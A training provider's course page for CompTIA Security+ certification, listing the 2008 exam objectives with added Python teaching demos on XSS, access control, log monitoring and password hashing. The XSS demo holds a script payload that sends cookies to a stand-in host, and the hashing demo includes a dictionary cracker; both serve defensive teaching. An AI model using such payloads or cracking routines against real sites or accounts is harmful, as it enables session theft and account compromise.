CompTIA Security+ Certification


ZNET-017 Essentials for CompTIA Security+ Certification (32 hours)
Fee: $829 includes textbook and practice exams
or $xxx also includes one certification exam voucher
Check out Our Free Retake Policy for IT Certification Programs

Call for 2013 Schedule December TBA


Free Information Session
We Will Explore Your IT Training and Certification Options
Call for an appointment to talk with one of our Technology Experts

Course Description

The CompTIA Security+ Certification is a vendor-neutral credential. The Security+ exam is an internationally recognized validation of foundation-level security skills and knowledge, and is used by organizations and security professionals around the globe.

This certification program helps prepare students for the CompTIA Security+ certification exam. Students learn about industry-wide IT security topics, including communication security, infrastructure security, cryptography, access control, authentication, external attacks, and operational and organizational security. The course also covers the protocols used by Linux, UNIX, and Windows, the component protocols of the TCP/IP suite, and Ethernet operation. Students gain hands-on experience capturing, analyzing, and generating IP traffic, exploiting protocol weaknesses, and examining defensive solutions. Packet filtering, password policies, and file integrity checking are also covered.

Skills Measured

This course examines and covers the following topics:
  • Network perimeter security and elements of an effective security policy.

  • Encryption, including the three main encryption methods used in internetworking.

  • Universal guidelines and principles for effective network security, as well as guidelines to create effective specific solutions.

  • Security principles and security attack identification.

  • Firewall types and common firewall terminology.

  • Firewall system planning including levels of protection.

  • Network firewall deployment.

  • Network security including industry security evaluation criteria and guidelines used to determine three security levels.

  • Mechanisms used to implement security systems, tools to evaluate key security parameters, techniques for security accounts, and threats to Windows and UNIX systems.

  • Permissions identification, assignment and usage, system defaults, and security commands.

  • System patches and fixes including application of system patches.

  • Windows 2000 Registry modifications, plus lockdown and removal of unneeded services for effective security in Windows 2000 and Linux.

  • Security auditing principles, security auditor's chief duties and network risk factor assessment.

  • Security auditing and discovery processes, audit plans, and network-based and host-based discovery software.

  • Penetration strategies and methods, including identification of potential attacks.

  • User activities baseline, log analysis, and auditing of various activities.

  • Security policy compliance and assessment reports.

  • Operating system add-ons, including personal firewalls and native auditing.

  • Identifying threats to, and protecting, wireless networks.

Prerequisites

It is recommended that students in this course have knowledge
and skills equivalent to the CompTIA Network+ Certification.

Other certifications or equivalent knowledge that would be beneficial:


CompTIA Security+ (2008) Objectives

CompTIA Security+ (2008) Objectives - Printer Friendly version (PDF File)

The table below lists the domain areas measured by this examination and the approximate extent to which they are represented in the examination:

Domain                          % of Examination
1.0 Systems Security            21%
2.0 Network Infrastructure      20%
3.0 Access Control              17%
4.0 Assessments & Audits        15%
5.0 Cryptography                15%
6.0 Organizational Security     12%
Total                          100%

**Note: The lists of examples provided in bulleted format below each objective are not exhaustive lists. Other examples of technologies, processes or tasks pertaining to each objective may also be included on the exam although not listed or covered in this objectives document.

1.0 Systems Security

1.1 Differentiate among various systems security threats.

  • Privilege escalation
  • Virus
  • Worm
  • Trojan
  • Spyware
  • Spam
  • Adware
  • Rootkits
  • Botnets
  • Logic bomb

1.2 Explain the security risks pertaining to system hardware and peripherals.

  • BIOS
  • USB devices
  • Cell phones
  • Removable storage
  • Network attached storage

1.3 Implement OS hardening practices and procedures to achieve workstation and server security.

  • Hotfixes
  • Service packs
  • Patches
  • Patch management
  • Group policies
  • Security templates
  • Configuration baselines

1.4 Carry out the appropriate procedures to establish application security.

  • ActiveX
  • Java
  • Scripting
  • Browser
  • Buffer overflows
  • Cookies
  • SMTP open relays
  • Instant messaging
  • P2P
  • Input validation
  • Cross-site scripting (XSS)
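
Two of the items above, input validation and cross-site scripting, are easiest to understand side by side. The following Python is an added illustration written for this page, not course material and not code from CompTIA; the comment template, the username allow-list, the `evil.example` host and the payload are all constructed for the demo. The vulnerable renderer drops untrusted input straight into markup; the hardened one validates what can be validated against an allow-list and HTML-encodes everything else.

```python
"""Input validation and output encoding for a comment form (Security+ 1.4).

Added illustration, not course material. Two renderers for the same HTML
template: the first interpolates user input verbatim (reflected XSS); the
second validates the username against an allow-list and HTML-encodes every
value before it reaches the page.
"""
import html
import re

# Constructed template for the demo.
TEMPLATE = '<p class="comment"><b>{user}</b> wrote: {body}</p>'

# Allow-list for usernames: 3-32 characters of letters, digits, underscore, dot.
# A username has no legitimate need for '<', '"' or '&', so reject, don't encode.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.]{3,32}$")


def render_vulnerable(user: str, body: str) -> str:
    """Untrusted input goes straight into markup: any <script> in 'body'
    runs in every viewer's browser with that site's cookies."""
    return TEMPLATE.format(user=user, body=body)


def render_hardened(user: str, body: str) -> str:
    """Validate what can be validated, encode everything else."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("invalid username")
    # quote=True also encodes ' and ", so the value is safe inside an
    # attribute value as well as in a text node.
    return TEMPLATE.format(user=html.escape(user, quote=True),
                           body=html.escape(body, quote=True))


def contains_active_markup(rendered: str) -> bool:
    """Crude check used by the demo: did a live tag survive into the output?"""
    low = rendered.lower()
    return "<script" in low or "onerror=" in low


# Constructed cookie-stealing payload (hypothetical host evil.example).
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    bad = render_vulnerable("alice", PAYLOAD)
    good = render_hardened("alice", PAYLOAD)
    print("vulnerable:", bad)
    print("hardened:  ", good)
    print("script survives in vulnerable output:", contains_active_markup(bad))
    print("script survives in hardened output:  ", contains_active_markup(good))
```

Rejecting a bad username outright, rather than encoding it, is the allow-list half of input validation; encoding the free-text body is the output-encoding half. Both are needed: validation alone cannot cover a field that legitimately contains punctuation, and encoding alone still lets junk into the database.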

1.5 Implement security applications.

  • HIDS
  • Personal software firewalls
  • Antivirus
  • Anti-spam
  • Popup blockers

1.6 Explain the purpose and application of virtualization technology.

2.0 Network Infrastructure

2.1 Differentiate between the different ports & protocols, their respective threats and mitigation techniques.

  • Antiquated protocols
  • TCP/IP hijacking
  • Null sessions
  • Spoofing
  • Man-in-the-middle
  • Replay
  • DOS
  • DDOS
  • Domain Name Kiting
  • DNS poisoning
  • ARP poisoning

2.2 Distinguish between network design elements and components.

  • DMZ
  • VLAN
  • NAT
  • Network interconnections
  • NAC
  • Subnetting
  • Telephony

2.3 Determine the appropriate use of network security tools to facilitate network security.

  • NIDS
  • NIPS
  • Firewalls
  • Proxy servers
  • Honeypot
  • Internet content filters
  • Protocol analyzers

2.4 Apply the appropriate network tools to facilitate network security.

  • NIDS
  • Firewalls
  • Proxy servers
  • Internet content filters
  • Protocol analyzers

2.5 Explain the vulnerabilities and mitigations associated with network devices.

  • Privilege escalation
  • Weak passwords
  • Back doors
  • Default accounts
  • DOS

2.6 Explain the vulnerabilities and mitigations associated with various transmission media.

  • Vampire taps

2.7 Explain the vulnerabilities and implement mitigations associated with wireless networking.

  • Data emanation
  • War driving
  • SSID broadcast
  • Blue jacking
  • Bluesnarfing
  • Rogue access points
  • Weak encryption

3.0 Access Control

3.1 Identify and apply industry best practices for access control methods.

  • Implicit deny
  • Least privilege
  • Separation of duties
  • Job rotation

3.2 Explain common access control models and the differences between each.

  • MAC
  • DAC
  • Role & Rule based access control
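
The four models in 3.2, together with implicit deny and least privilege from 3.1, can be shown as four small decision functions. The Python below is an added illustration for this page, not course material or CompTIA code; the clearance levels, file ACL, roles and firewall rules are constructed. Each function returns False whenever nothing explicitly grants the request, which is what implicit deny means in practice.

```python
"""Implicit deny, least privilege, and four access control models
(Security+ 3.1 / 3.2). Added illustration, not course material; the
objects, roles, clearances and rules are constructed for the demo."""
from enum import IntEnum


class Level(IntEnum):
    """MAC sensitivity labels, ordered low to high."""
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


# --- MAC: labels are assigned by the system, not the object's owner ---
def mac_allowed(subject_clearance: Level, object_label: Level, action: str) -> bool:
    """Bell-LaPadula confidentiality rules: no read up, no write down.
    Any action not covered by a rule is implicitly denied."""
    if action == "read":
        return subject_clearance >= object_label
    if action == "write":
        return subject_clearance <= object_label
    return False


# --- DAC: the owner decides; permissions live with the object ---
DAC_OBJECTS = {
    "payroll.xlsx": {"owner": "bob",
                     "acl": {"bob": {"read", "write"}, "alice": {"read"}}},
}


def dac_allowed(user: str, obj: str, action: str) -> bool:
    entry = DAC_OBJECTS.get(obj)
    if entry is None:
        return False                      # unknown object: implicit deny
    if user == entry["owner"]:
        return True                       # owner may do anything, including re-share
    return action in entry["acl"].get(user, set())   # no ACE for user: implicit deny


# --- RBAC: permissions attach to roles; users are assigned roles ---
ROLE_PERMS = {
    "helpdesk": {"ticket:read", "ticket:write", "user:reset_password"},
    "auditor":  {"ticket:read", "log:read"},
}
USER_ROLES = {"carol": {"helpdesk"}, "dave": {"auditor"}}


def rbac_allowed(user: str, perm: str) -> bool:
    """Least privilege: a user holds exactly the union of their roles' permissions."""
    return any(perm in ROLE_PERMS.get(role, set())
               for role in USER_ROLES.get(user, set()))


# --- Rule-based: an ACL evaluated top-down, first match wins, default deny ---
RULES = [  # (source prefix, destination port, action); prefix match is a simplification
    ("10.0.0.", 22, "allow"),
    ("10.0.0.", 445, "deny"),
    ("192.168.", 443, "allow"),
]


def rule_allowed(src_ip: str, dst_port: int) -> bool:
    for prefix, port, action in RULES:
        if src_ip.startswith(prefix) and port == dst_port:
            return action == "allow"
    return False                          # no rule matched: implicit deny


if __name__ == "__main__":
    print("SECRET reads CONFIDENTIAL:", mac_allowed(Level.SECRET, Level.CONFIDENTIAL, "read"))
    print("SECRET writes CONFIDENTIAL:", mac_allowed(Level.SECRET, Level.CONFIDENTIAL, "write"))
    print("alice writes payroll:", dac_allowed("alice", "payroll.xlsx", "write"))
    print("dave resets passwords:", rbac_allowed("dave", "user:reset_password"))
    print("10.0.0.5 -> tcp/80:", rule_allowed("10.0.0.5", 80))
```

The difference the exam tests for is who sets the policy: in MAC the system does and the owner cannot override it; in DAC the owner can hand out rights at will (which is why DAC alone cannot enforce need-to-know); in RBAC and rule-based systems an administrator sets roles or rules and users inherit them.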

3.3 Organize users and computers into appropriate security groups and roles while distinguishing between appropriate rights and privileges.

3.4 Apply appropriate security controls to file and print resources.

3.5 Compare and implement logical access control methods.

  • ACL
  • Group policies
  • Password policy
  • Domain password policy
  • User names and passwords
  • Time of day restrictions
  • Account expiration
  • Logical tokens

3.6 Summarize the various authentication models and identify the components of each.

  • One, two and three-factor authentication
  • Single sign-on

3.7 Deploy various authentication models and identify the components of each.

  • Biometric reader
  • RADIUS
  • RAS
  • LDAP
  • Remote access policies
  • Remote authentication
  • VPN
  • Kerberos
  • CHAP
  • PAP
  • Mutual
  • 802.1x
  • TACACS

3.8 Explain the difference between identification and authentication (identity proofing).

3.9 Explain and apply physical access security methods.

  • Physical access logs/lists
  • Hardware locks
  • Physical access control – ID badges
  • Door access systems
  • Man-trap
  • Physical tokens
  • Video surveillance – camera types and positioning

4.0 Assessments & Audits

4.1 Conduct risk assessments and implement risk mitigation.

4.2 Carry out vulnerability assessments using common tools.

  • Port scanners
  • Vulnerability scanners
  • Protocol analyzers
  • OVAL
  • Password crackers
  • Network mappers

4.3 Within the realm of vulnerability assessments, explain the use of penetration testing versus vulnerability scanning.

4.4 Use monitoring tools on systems and networks and detect security-related anomalies.

  • Performance monitor
  • Systems monitor
  • Performance baseline
  • Protocol analyzers

4.5 Compare and contrast various types of monitoring methodologies.

  • Behavior-based
  • Signature-based
  • Anomaly-based

4.6 Execute proper logging procedures and evaluate the results.

  • Security application
  • DNS
  • System
  • Performance
  • Access
  • Firewall
  • Antivirus
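
Objectives 4.4 through 4.6 come together when a monitor is run over real log lines: a performance or activity baseline is learned from a quiet period, a signature list catches known-bad events regardless of volume, and an anomaly rule flags sources that deviate from the baseline. The Python below is an added illustration for this page, not course material or CompTIA code. The sshd-style log lines are constructed; the host `web1`, the addresses and the threshold of three standard deviations are assumptions for the demo.

```python
"""Signature-based vs anomaly-based monitoring over auth log lines
(Security+ 4.4 / 4.5 / 4.6). Added illustration, not course material.
The log lines are constructed in the style of a Linux sshd syslog."""
import re
from collections import Counter
from statistics import mean, pstdev

LINE_RE = re.compile(
    r"^(?P<ts>\S+\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

# Signature-based: known-bad indicators that fire on a single line.
SIGNATURES = {
    "login_as_root": re.compile(r"Accepted \w+ for root from"),
    "invalid_user":  re.compile(r"invalid user"),
}


def parse(lines):
    """Yield (timestamp, message) for lines that look like sshd records;
    anything else is skipped so one odd line cannot crash the monitor."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.group("ts"), m.group("msg")


def signature_hits(lines):
    """Every (signature name, message) pair matching a known-bad pattern."""
    return [(name, msg) for _, msg in parse(lines)
            for name, rx in SIGNATURES.items() if rx.search(msg)]


def failures_per_source(lines) -> Counter:
    counts = Counter()
    for _, msg in parse(lines):
        m = FAILED_RE.search(msg)
        if m:
            counts[m.group("ip")] += 1
    return counts


def anomalous_sources(baseline_lines, current_lines, k=3.0):
    """Anomaly-based: learn the per-source failure count from a quiet
    baseline window, then flag sources more than k std devs above it.
    A one-sigma floor keeps a very quiet baseline from flagging everything."""
    base = failures_per_source(baseline_lines)
    mu = mean(base.values()) if base else 0.0
    sigma = pstdev(base.values()) if len(base) > 1 else 1.0
    threshold = mu + k * max(sigma, 1.0)
    return {ip: n for ip, n in failures_per_source(current_lines).items()
            if n > threshold}


# Constructed baseline: normal users mistyping a password once or twice.
BASELINE = [
    "Mar  3 09:01:10 web1 sshd[1201]: Failed password for alice from 10.0.0.12 port 50122 ssh2",
    "Mar  3 09:02:41 web1 sshd[1203]: Accepted password for alice from 10.0.0.12 port 50123 ssh2",
    "Mar  3 10:15:02 web1 sshd[1340]: Failed password for bob from 10.0.0.33 port 41002 ssh2",
    "Mar  3 10:15:09 web1 sshd[1340]: Failed password for bob from 10.0.0.33 port 41002 ssh2",
    "Mar  3 10:15:20 web1 sshd[1340]: Accepted password for bob from 10.0.0.33 port 41002 ssh2",
]

# Constructed current window: one normal login, one junk line, and a
# password-guessing run from 203.0.113.7 that ends in a root login.
CURRENT = [
    "Mar  4 08:30:00 web1 sshd[2101]: Failed password for alice from 10.0.0.12 port 50200 ssh2",
    "Mar  4 08:30:06 web1 sshd[2101]: Accepted password for alice from 10.0.0.12 port 50200 ssh2",
    "this line is not an sshd record and must be ignored",
] + [
    f"Mar  4 02:00:{i:02d} web1 sshd[22{i:02d}]: Failed password for invalid user admin "
    f"from 203.0.113.7 port 33001 ssh2"
    for i in range(12)
] + [
    "Mar  4 02:00:30 web1 sshd[2299]: Accepted password for root from 203.0.113.7 port 33001 ssh2",
]

if __name__ == "__main__":
    for name, msg in signature_hits(CURRENT):
        print(f"[signature:{name}] {msg}")
    for ip, n in anomalous_sources(BASELINE, CURRENT).items():
        print(f"[anomaly] {ip}: {n} failed logins vs baseline")
```

The two methods catch different things: the signature list fires on the very first `invalid user` line and on the root login, while the anomaly rule would also flag a slow guessing run against a valid account that no signature matches. A behavior-based monitor would go one step further and model what each account normally does after logging in.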

4.7 Conduct periodic audits of system security settings.

  • User access and rights review
  • Storage and retention policies
  • Group policies

5.0 Cryptography

5.1 Explain general cryptography concepts.

  • Key management
  • Steganography
  • Symmetric key
  • Asymmetric key
  • Confidentiality
  • Integrity and availability
  • Non-repudiation
  • Comparative strength of algorithms
  • Digital signatures
  • Whole disk encryption
  • Trusted Platform Module (TPM)
  • Single vs. Dual sided certificates
  • Use of proven technologies

5.2 Explain basic hashing concepts and map various algorithms to appropriate applications.

  • SHA
  • MD5
  • LANMAN
  • NTLM
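
The four algorithms listed for 5.2 differ mostly in how they fail. The Python below is an added illustration for this page, not course material or CompTIA code, and it also covers the "password crackers" item in 4.2 and "comparative strength of algorithms" in 5.1. It shows (a) why any unsalted, fast hash such as MD5 or SHA-1 falls to a dictionary attack regardless of the digest's own strength, (b) the preprocessing that makes LANMAN weak before any cryptography runs, and (c) a salted, iterated key-derivation function as the corrective. The wordlist and iteration count are constructed assumptions; the DES step of LANMAN is deliberately omitted.

```python
"""Comparative strength of password hashes (Security+ 5.2, with 4.2 password
crackers and 5.1 comparative strength). Added illustration, not course
material. The wordlist and iteration count are constructed for the demo."""
import hashlib
import hmac
import os

# Constructed wordlist standing in for a real cracker's dictionary.
WORDLIST = ["123456", "password", "letmein", "Password123", "qwerty", "s3cr3t"]


def unsalted_hash(password: str, algo: str = "md5") -> str:
    """How many legacy systems store passwords: a bare, fast digest."""
    return hashlib.new(algo, password.encode()).hexdigest()


def dictionary_crack(target_hex: str, algo: str = "md5"):
    """One digest per candidate, no per-user cost, and the work can be
    precomputed into a table once and reused against every user.
    Returns the recovered password or None."""
    for word in WORDLIST:
        if unsalted_hash(word, algo) == target_hex:
            return word
    return None


def lm_halves(password: str):
    """LANMAN preprocessing: uppercase, truncate or NUL-pad to 14 bytes,
    split into two independent 7-byte halves. Each half then keys DES over
    a fixed constant (omitted here, since it is deterministic: equal halves
    give equal LM hashes). The effective search space is therefore two
    7-character case-insensitive passwords, not one 14-character one, and a
    second half of all NULs reveals a password of 7 characters or fewer."""
    raw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


# --- salted and iterated: what a password store should look like instead ---
ITERATIONS = 200_000   # tuned per deployment; every guess costs the attacker this much


def make_record(password: str) -> dict:
    salt = os.urandom(16)   # unique per user, so a precomputed table is useless
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "hash": dk, "iterations": ITERATIONS}


def verify(password: str, record: dict) -> bool:
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["hash"])   # constant-time compare


if __name__ == "__main__":
    print("md5('letmein') cracked as:", dictionary_crack(unsalted_hash("letmein")))
    print("LM halves of 'Password123':", lm_halves("Password123"))
    print("same LM halves for 'password123'?",
          lm_halves("password123") == lm_halves("Password123"))
    rec = make_record("letmein")
    print("pbkdf2 verify correct/incorrect:", verify("letmein", rec), verify("letmein1", rec))
```

NTLM is not computed here (MD4 is often unavailable in modern OpenSSL builds), but the point carries over: the NT hash is a single unsalted MD4 of the UTF-16LE password, so it keeps the full character set and length but still yields to the same precomputed-table attack as the MD5 case above.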

5.3 Explain basic encryption concepts and map various algorithms to appropriate applications.

  • DES
  • 3DES
  • RSA
  • PGP
  • Elliptic curve
  • AES
  • AES256
  • One time pad
  • Transmission encryption (WEP TKIP, etc)

5.4 Explain and implement protocols.

  • SSL/TLS
  • S/MIME
  • PPTP
  • HTTP vs. HTTPS vs. SHTTP
  • L2TP
  • IPSEC
  • SSH

5.5 Explain core concepts of public key cryptography.

  • Public Key Infrastructure (PKI)
  • Recovery agent
  • Public key
  • Private keys
  • Certificate Authority (CA)
  • Registration
  • Key escrow
  • Certificate Revocation List (CRL)
  • Trust models

5.6 Implement PKI and certificate management.

  • Public Key Infrastructure (PKI)
  • Recovery agent
  • Public key
  • Private keys
  • Certificate Authority (CA)
  • Registration
  • Key escrow
  • Certificate Revocation List (CRL)

6.0 Organizational Security

6.1 Explain redundancy planning and its components.

  • Hot site
  • Cold site
  • Warm site
  • Backup generator
  • Single point of failure
  • RAID
  • Spare parts
  • Redundant servers
  • Redundant ISP
  • UPS
  • Redundant connections

6.2 Implement disaster recovery procedures.

  • Planning
  • Disaster recovery exercises
  • Backup techniques and practices – storage
  • Schemes
  • Restoration

6.3 Differentiate between and execute appropriate incident response procedures.

  • Forensics
  • Chain of custody
  • First responders
  • Damage and loss control
  • Reporting – disclosure of

6.4 Identify and explain applicable legislation and organizational policies.

  • Secure disposal of computers
  • Acceptable use policies
  • Password complexity
  • Change management
  • Classification of information
  • Mandatory vacations
  • Personally Identifiable Information (PII)
  • Due care
  • Due diligence
  • Due process
  • SLA
  • Security-related HR policy
  • User education and awareness training

6.5 Explain the importance of environmental controls.

  • Fire suppression
  • HVAC
  • Shielding

6.6 Explain the concept of and how to reduce the risks of social engineering.

  • Phishing
  • Hoaxes
  • Shoulder surfing
  • Dumpster diving
  • User education and awareness training

Approved for DOD Information Assurance Directive 8570.1

Directive 8570 is a policy from the Department of Defense’s Information Assurance Workforce Improvement Program that requires any DoD employee and any contractor working with the DoD to possess certain Information Assurance training and certifications. The Directive makes certain that Information Assurance personnel meet training and certification requirements related to their IT security job functions via annual metrics reporting of their workforce.

The goal of the Directive is a uniform, professional Information Assurance workforce with the knowledge and skills to effectively prevent and respond to attacks against DoD information, information systems and information infrastructures. The efforts of this program and Directive 8570 will enable the DoD to properly place Information Assurance personnel according to their skills.  (Source: www.isaca.org)

The U.S. Department of Defense recognizes CompTIA certifications in its technical and management tracks for information assurance technicians and managers under DoD Directive 8570.1M. Currently STCC offers instructor-led courses for CompTIA A+ and Network+ Certification, and web-based courses for CompTIA Security+. Prospective employees, current employees and IT contractors alike must meet the requirements of the Directive to be employed.


Industry Acceptance

CompTIA Security+ certification is widely recognized in the industry.

Olympus Security Group requires Security+ for all of its consultants, as does a growing number of companies and agencies, including:

  • Sun Microsystems

  • IBM/Tivoli Software Group

  • Symantec

  • Motorola

  • Microsoft

Get your career on the fast track with CompTIA Security+ certification and establish your credibility as a Security professional.

     

